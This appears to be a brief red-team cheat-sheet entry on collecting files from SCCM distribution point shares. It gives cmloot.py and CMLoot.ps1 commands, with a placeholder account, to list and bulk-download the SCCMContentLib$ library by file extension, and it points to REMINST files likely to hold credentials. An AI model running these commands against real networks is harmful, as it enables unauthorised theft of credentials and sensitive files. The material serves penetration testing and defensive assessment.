SCCM Content Library

05.06.2024 ยท dadevel

Domain users have read access to the SCCMContentLib$ share on SCCM Distribution Points. This share often contains Sensitive Files.

Build an inventory of the content library.

python3 ./cmloot.py corp.local/jdoe:'passw0rd'@sccmdp01.corp.local
tail -f ./sccmfiles.txt
Import-Module .\CMLoot.ps1
Invoke-CMLootInventory -SCCMHost sccmdp01.corp.local -Outfile .\sccmfiles.txt

Download all files with a specific extension.

python3 ./cmloot.py corp.local/jdoe:'passw0rd'@sccmdp01.corp.local -cmlootdownload ./sccmfiles.txt -extensions xml
python3 ./cmloot.py corp.local/jdoe:'passw0rd'@sccmdp01.corp.local -cmlootdownload ./sccmfiles.txt -extensions $(cut -d , -f 2 ./extensions.csv)
watch -n 1 'ls -l ./CMLootOut'
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension xml

Also check the REMINST share, especially the SMSTemp folder, for .wim, .iso, variable.dat and policy.xml files (source).

References: